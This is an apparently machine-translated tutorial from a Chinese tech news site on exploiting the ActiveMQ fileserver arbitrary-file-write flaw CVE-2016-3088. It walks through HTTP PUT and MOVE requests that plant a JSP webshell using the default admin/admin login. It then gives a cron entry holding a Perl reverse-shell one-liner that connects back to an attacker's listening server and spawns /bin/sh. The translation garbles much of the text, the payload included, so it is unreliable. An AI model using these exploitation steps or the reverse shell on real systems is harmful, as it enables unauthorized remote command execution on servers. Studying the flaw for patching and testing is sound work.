Shulou(Shulou.com)05/31 Report--

ActiveMQ arbitrary file writing vulnerability CVE-2016-3088 example analysis, many novices are not very clear about this, in order to help you solve this problem, the following editor will explain in detail for you, people with this need can come to learn, I hope you can gain something.

Background introduction

The ActiveMQ Web console is divided into three applications: admin,api and fileserver, where admin is the administrator page, api is the interface, and fileserver is the interface for storing files; admin and api need to be logged in before they can be used, and fileserver does not need to log in.

The file server is the RESTful API interface. We can read and write the files stored in them through HTTP requests, such as GET,PUT and DELETE. It was designed to make up for the defect that message queuing operations were unable to transfer and store binaries but later discovered:

The utilization rate is not high

File operation is prone to loopholes.

Therefore, ActiveMQ closes the file server application in 5.12.x~5.13.x by default (you can open it in conf / jetty.xml). After 5.14.0, the file server application will be completely deleted.

During testing, you should pay attention to the version of ActiveMQ to avoid wasting energy.

Vulnerability details

This vulnerability occurs in Fileserver applications, and the principle of the vulnerability is actually very simple, that is, the file server supports writing to files (but does not parse JSP) and supports moving files (MOVE requests). Therefore, we only need to write a file and then move it to any location using a move request, which can lead to an arbitrary file write vulnerability.

Vulnerability exploitation

There are several ways to use file writing:

1. Write to webshell

2. Write to files such as cron or ssh key

3. Write to libraries and configuration files such as jar or jetty.xml

The advantage of writing webshell is convenient, but the file server does not need to parse jsp,admin and api both need to log in to access, so it is a bit futile. The advantage of writing cron or ssh keys is to reverse Shell directly, which is also very convenient, but the disadvantage is that you need root permission; writing jar is a bit troublesome (requires a jar back door), and writing xml configuration files is a reliable method, but it is a bit futile: we need to know the absolute path of ActiveMQ.

Next, let's try these three methods: one. Write to webshell

As mentioned earlier, Webshell must be written in Admin or Api applications, and both applications must be logged in to access.

The default ActiveMQ account and password is admin.

Then go to the fileserver folder under the home page.

Bp grab the package (just refresh the page), then send it to the repeater, change it to the PUT method, and write it to shell. The code is as follows:

PUT / fileserver/1.txt HTTP/1.1

Check the corresponding directory and find that the shell file has indeed been written, but the txt format file cannot be executed, so it needs to be converted to the jsp format file to execute.

Continue to grab the package, send to repeater, change the package method to MOVE, and the path is Destination: file:///opt/activemq/webapps/api/testhacker.jsp because the api directory can parse the jsp file.

Enter the api directory to view the newly moved testhacker.jsp. A blank page indicates that the webshell has been uploaded successfully.

At this point, you can execute the command after url and successfully return the result.

You can also look at the generated files under the website directory of the target machine.

Supplement related to experiment

The threshold for writing webshell is low and convenient, but the fileserver directory does not have the permission to execute jsp. If you want to execute the webshell of jsp, you need to put the jsp file into the admin or api directory, which have the permission to parse jsp, but these two directories need to be logged in to enter. So when the response is 4XX, you need to log in.

Loophole principle

According to the above operation, it can be found that the principle of the vulnerability is simply that the fileserver directory supports writing files, and this directory supports move requests to move files. Therefore, we only need to write a file, and then move it through move to a directory that can parse the jsp file, and execution will cause arbitrary file writing vulnerabilities.

The process is: write the file (put method)-- > move the file (move method)-- > execute the file

two。 Write to crontab and bounce shell with scheduled tasks

This is a relatively robust method. Upload the cron configuration file first (note that line wrapping must be `\ n`, not`\ r\ n`, otherwise crontab execution will fail).

Directly visit the yourip:port/fileserver and grab the packet, write the following code into the captured data packet, and change the PUT mode to modify the listening ip and port

* / 1 * root / usr/bin/perl-e'use Socket;$i= "listens to vps's IP"; $p = listening port; socket (SMagp PFRTINETGravity SOCKSTREAM.dgetprotobyname ("tcp")); if (connect (Smae sockaddringin ($pmae inetyogaton ($I) {open (STDIN, "> & S"); open (STDOUT, "> & S"); open (STDERR, "> & S"); exec ("/ bin/sh-I");};

Then the web page visits the file and grabs the package, change GET to MOVE mode, and move it to the / etc/cron.d/root directory, the path is Destination: file:///etc/cron.d/root

This method requires that ActiveMQ is run as root, otherwise it cannot be written to the cron file.

If both of the above requests return 204, the write is successful. Listen to the corresponding port and wait for the shell to rebound:

The third way to write jetty.xml or jar do not understand, so do not write. Is it helpful for you to read the above content? If you want to know more about the relevant knowledge or read more related articles, please follow the industry information channel, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.